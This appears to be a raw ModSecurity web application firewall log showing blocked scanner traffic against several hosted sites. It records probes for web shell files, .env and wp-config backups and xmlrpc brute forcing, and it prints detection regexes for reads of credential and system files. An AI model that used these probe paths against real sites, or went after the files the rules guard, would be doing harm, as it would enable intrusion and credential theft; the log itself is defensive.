[Tue May 26 13:49:02.577277 2026] [security2:error] [pid 555743:tid 555957] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXdsjqAquC0YaxQjCuxwAAAV4"]
[Tue May 26 13:49:02.703351 2026] [security2:error] [pid 560287:tid 560448] [client 20.205.111.246:1918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/my1.php"] [unique_id "ahVXdpmX5s6sDS3wJVcLRQAAAKI"]
[Tue May 26 13:49:02.868468 2026] [security2:error] [pid 560287:tid 560470] [client 15.235.169.50:62476] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-l0gin.php"] [unique_id "ahVXdpmX5s6sDS3wJVcLUAAAALY"]
[Tue May 26 13:49:02.901904 2026] [security2:error] [pid 560287:tid 560456] [client 107.189.7.156:14312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXdpmX5s6sDS3wJVcLUQAAAKk"]
[Tue May 26 13:49:03.253801 2026] [security2:error] [pid 560287:tid 560516] [client 143.244.49.23:4020] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "thegoodsporting.com"] [uri "/.env"] [unique_id "ahVXd5mX5s6sDS3wJVcLYAAAAOI"]
[Tue May 26 13:49:03.338272 2026] [security2:error] [pid 560287:tid 560440] [client 15.235.169.50:62536] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/fm.php"] [unique_id "ahVXd5mX5s6sDS3wJVcLZgAAAJs"]
[Tue May 26 13:49:03.393314 2026] [security2:error] [pid 555743:tid 555920] [client 20.205.111.246:1905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/mm.php"] [unique_id "ahVXd8jqAquC0YaxQjCu1wAAATk"]
[Tue May 26 13:49:03.806547 2026] [security2:error] [pid 560287:tid 560466] [client 15.235.169.50:62606] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Text/themes.php"] [unique_id "ahVXd5mX5s6sDS3wJVcLgAAAALM"]
[Tue May 26 13:49:04.089519 2026] [security2:error] [pid 560287:tid 560503] [client 20.205.111.246:1641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/network.php"] [unique_id "ahVXeJmX5s6sDS3wJVcLiQAAANU"]
[Tue May 26 13:49:04.295344 2026] [security2:error] [pid 555743:tid 555925] [client 15.235.169.50:62661] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-info.php"] [unique_id "ahVXeMjqAquC0YaxQjCu6QAAAT4"]
[Tue May 26 13:49:04.534246 2026] [security2:error] [pid 560287:tid 560527] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXeJmX5s6sDS3wJVcLjAAAAO0"]
[Tue May 26 13:49:04.773157 2026] [security2:error] [pid 560287:tid 560482] [client 20.205.111.246:6388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/new.php"] [unique_id "ahVXeJmX5s6sDS3wJVcLqwAAAME"]
[Tue May 26 13:49:04.782150 2026] [security2:error] [pid 555743:tid 555890] [client 15.235.169.50:62759] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/about.php"] [unique_id "ahVXeMjqAquC0YaxQjCu-QAAARs"]
[Tue May 26 13:49:05.271583 2026] [security2:error] [pid 560287:tid 560418] [client 15.235.169.50:62840] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/test.php"] [unique_id "ahVXeZmX5s6sDS3wJVcLywAAAIU"]
[Tue May 26 13:49:05.486126 2026] [security2:error] [pid 555743:tid 555958] [client 20.205.111.246:2157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/0x.php"] [unique_id "ahVXecjqAquC0YaxQjCvEAAAAV8"]
[Tue May 26 13:49:05.608440 2026] [security2:error] [pid 560287:tid 560421] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXeZmX5s6sDS3wJVcLyQAAAIg"]
[Tue May 26 13:49:05.730988 2026] [security2:error] [pid 560287:tid 560478] [client 15.235.169.50:62913] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVXeZmX5s6sDS3wJVcL4gAAAL4"]
[Tue May 26 13:49:06.175362 2026] [security2:error] [pid 555743:tid 555902] [client 20.205.111.246:1657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/0.php"] [unique_id "ahVXesjqAquC0YaxQjCvKAAAASc"]
[Tue May 26 13:49:06.195575 2026] [security2:error] [pid 560287:tid 560520] [client 15.235.169.50:63004] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/text.php"] [unique_id "ahVXepmX5s6sDS3wJVcL-QAAAOY"]
[Tue May 26 13:49:06.664406 2026] [security2:error] [pid 560287:tid 560478] [client 15.235.169.50:63066] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/colors/blue/atomlib.php"] [unique_id "ahVXepmX5s6sDS3wJVcMEAAAAL4"]
[Tue May 26 13:49:06.900108 2026] [security2:error] [pid 560287:tid 560509] [client 20.205.111.246:1580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/oxshell.php"] [unique_id "ahVXepmX5s6sDS3wJVcMGgAAANs"]
[Tue May 26 13:49:07.121497 2026] [security2:error] [pid 555743:tid 555962] [client 15.235.169.50:63128] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/shell20211028.php"] [unique_id "ahVXe8jqAquC0YaxQjCvPAAAAWM"]
[Tue May 26 13:49:07.408880 2026] [security2:error] [pid 560287:tid 560433] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXepmX5s6sDS3wJVcMHwAAAJQ"]
[Tue May 26 13:49:07.513260 2026] [security2:error] [pid 555743:tid 555969] [client 107.189.7.156:14466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXe8jqAquC0YaxQjCvQwAAAWo"]
[Tue May 26 13:49:07.586863 2026] [security2:error] [pid 560287:tid 560511] [client 20.205.111.246:1630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/php8.php"] [unique_id "ahVXe5mX5s6sDS3wJVcMQgAAAN0"]
[Tue May 26 13:49:07.599082 2026] [security2:error] [pid 560287:tid 560474] [client 15.235.169.50:63183] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/x.php"] [unique_id "ahVXe5mX5s6sDS3wJVcMQwAAALo"]
[Tue May 26 13:49:07.783303 2026] [security2:error] [pid 560287:tid 560545] [client 129.222.147.134:48439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXe5mX5s6sDS3wJVcMTAAAAP0"]
[Tue May 26 13:49:07.788100 2026] [security2:error] [pid 560287:tid 560545] [client 129.222.147.134:48439] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXe5mX5s6sDS3wJVcMTAAAAP0"]
[Tue May 26 13:49:07.856813 2026] [security2:error] [pid 555743:tid 555953] [client 107.189.7.156:14370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXe8jqAquC0YaxQjCvSAAAAVo"]
[Tue May 26 13:49:07.881977 2026] [security2:error] [pid 560287:tid 560516] [client 173.239.214.38:56745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.214.239.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "traderscafe.in"] [uri "/wp-login.php"] [unique_id "ahVXe5mX5s6sDS3wJVcMPAAAAOI"]
[Tue May 26 13:49:08.079379 2026] [security2:error] [pid 560287:tid 560423] [client 15.235.169.50:63261] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/index.php"] [unique_id "ahVXfJmX5s6sDS3wJVcMVwAAAIo"]
[Tue May 26 13:49:08.140330 2026] [security2:error] [pid 560287:tid 560437] [client 107.189.7.156:14382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfJmX5s6sDS3wJVcMWgAAAJg"]
[Tue May 26 13:49:08.308370 2026] [security2:error] [pid 555743:tid 555911] [client 20.205.111.246:6298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/p.php"] [unique_id "ahVXfMjqAquC0YaxQjCvUQAAATA"]
[Tue May 26 13:49:08.538668 2026] [security2:error] [pid 555743:tid 555924] [client 15.235.169.50:63323] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/maint/about.php"] [unique_id "ahVXfMjqAquC0YaxQjCvUgAAAT0"]
[Tue May 26 13:49:08.689618 2026] [security2:error] [pid 560287:tid 560524] [client 107.189.7.156:14486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfJmX5s6sDS3wJVcMaQAAAOo"]
[Tue May 26 13:49:08.855400 2026] [security2:error] [pid 555743:tid 555972] [client 107.189.7.156:14590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfMjqAquC0YaxQjCvWQAAAW0"]
[Tue May 26 13:49:08.991751 2026] [security2:error] [pid 560287:tid 560518] [client 107.189.7.156:14600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfJmX5s6sDS3wJVcMcwAAAOQ"]
[Tue May 26 13:49:09.009374 2026] [security2:error] [pid 560287:tid 560425] [client 20.205.111.246:1060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/php.php"] [unique_id "ahVXfZmX5s6sDS3wJVcMdQAAAIw"]
[Tue May 26 13:49:09.017574 2026] [security2:error] [pid 560287:tid 560527] [client 15.235.169.50:63382] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/calmly/issue.php"] [unique_id "ahVXfZmX5s6sDS3wJVcMdwAAAO0"]
[Tue May 26 13:49:09.212197 2026] [security2:error] [pid 560287:tid 560511] [client 107.189.7.156:14596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfZmX5s6sDS3wJVcMfAAAAN0"]
[Tue May 26 13:49:09.328406 2026] [security2:error] [pid 560287:tid 560490] [client 107.189.7.156:14522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfZmX5s6sDS3wJVcMfgAAAMk"]
[Tue May 26 13:49:09.375098 2026] [security2:error] [pid 560287:tid 560544] [client 107.189.7.156:14470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfZmX5s6sDS3wJVcMfwAAAPw"]
[Tue May 26 13:49:09.477200 2026] [security2:error] [pid 560287:tid 560459] [client 15.235.169.50:63464] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/install.php"] [unique_id "ahVXfZmX5s6sDS3wJVcMhAAAAKw"]
[Tue May 26 13:49:09.551863 2026] [security2:error] [pid 560287:tid 560533] [client 107.189.7.156:14626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfZmX5s6sDS3wJVcMiAAAAPM"]
[Tue May 26 13:49:09.614394 2026] [security2:error] [pid 560287:tid 560438] [client 107.189.7.156:14614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfZmX5s6sDS3wJVcMiwAAAJk"]
[Tue May 26 13:49:09.662360 2026] [security2:error] [pid 555743:tid 555928] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXfcjqAquC0YaxQjCvXQAAAUE"]
[Tue May 26 13:49:09.743302 2026] [security2:error] [pid 555743:tid 555997] [client 20.205.111.246:6307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/past.php"] [unique_id "ahVXfcjqAquC0YaxQjCvZAAAAYY"]
[Tue May 26 13:49:09.960824 2026] [security2:error] [pid 560287:tid 560514] [client 15.235.169.50:63576] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/network/wp-login.php"] [unique_id "ahVXfZmX5s6sDS3wJVcMjwAAAOA"]
[Tue May 26 13:49:10.099715 2026] [security2:error] [pid 560287:tid 560534] [client 107.189.7.156:14606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfpmX5s6sDS3wJVcMkAAAAPQ"]
[Tue May 26 13:49:10.244921 2026] [security2:error] [pid 560287:tid 560465] [client 107.189.7.156:14662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfpmX5s6sDS3wJVcMlQAAALI"]
[Tue May 26 13:49:10.376605 2026] [security2:error] [pid 560287:tid 560435] [client 107.189.7.156:14468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfpmX5s6sDS3wJVcMkQAAAJY"]
[Tue May 26 13:49:10.394754 2026] [security2:error] [pid 555743:tid 555954] [client 107.189.7.156:14636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfsjqAquC0YaxQjCvbwAAAVs"]
[Tue May 26 13:49:10.402560 2026] [security2:error] [pid 560287:tid 560504] [client 20.205.111.246:6318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/root.php"] [unique_id "ahVXfpmX5s6sDS3wJVcMnAAAANY"]
[Tue May 26 13:49:10.444034 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:63677] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/f.php"] [unique_id "ahVXfpmX5s6sDS3wJVcMnwAAAK4"]
[Tue May 26 13:49:10.531012 2026] [security2:error] [pid 555743:tid 555910] [client 107.189.7.156:14666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfsjqAquC0YaxQjCvcgAAAS8"]
[Tue May 26 13:49:10.809182 2026] [security2:error] [pid 555743:tid 555982] [client 107.189.7.156:51716] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfsjqAquC0YaxQjCvegAAAXc"]
[Tue May 26 13:49:10.865129 2026] [security2:error] [pid 555743:tid 555934] [client 107.189.7.156:14652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXfsjqAquC0YaxQjCvfwAAAUc"]
[Tue May 26 13:49:10.935755 2026] [security2:error] [pid 560287:tid 560528] [client 15.235.169.50:63756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/pomo/pomo.php"] [unique_id "ahVXfpmX5s6sDS3wJVcMrgAAAO4"]
[Tue May 26 13:49:11.123683 2026] [security2:error] [pid 555743:tid 555947] [client 20.205.111.246:1924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/r.php"] [unique_id "ahVXf8jqAquC0YaxQjCviAAAAVQ"]
[Tue May 26 13:49:11.400845 2026] [security2:error] [pid 555743:tid 555932] [client 15.235.169.50:63830] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/about.php"] [unique_id "ahVXf8jqAquC0YaxQjCvjgAAAUU"]
[Tue May 26 13:49:11.511405 2026] [security2:error] [pid 555743:tid 555980] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXf8jqAquC0YaxQjCvhgAAAXU"]
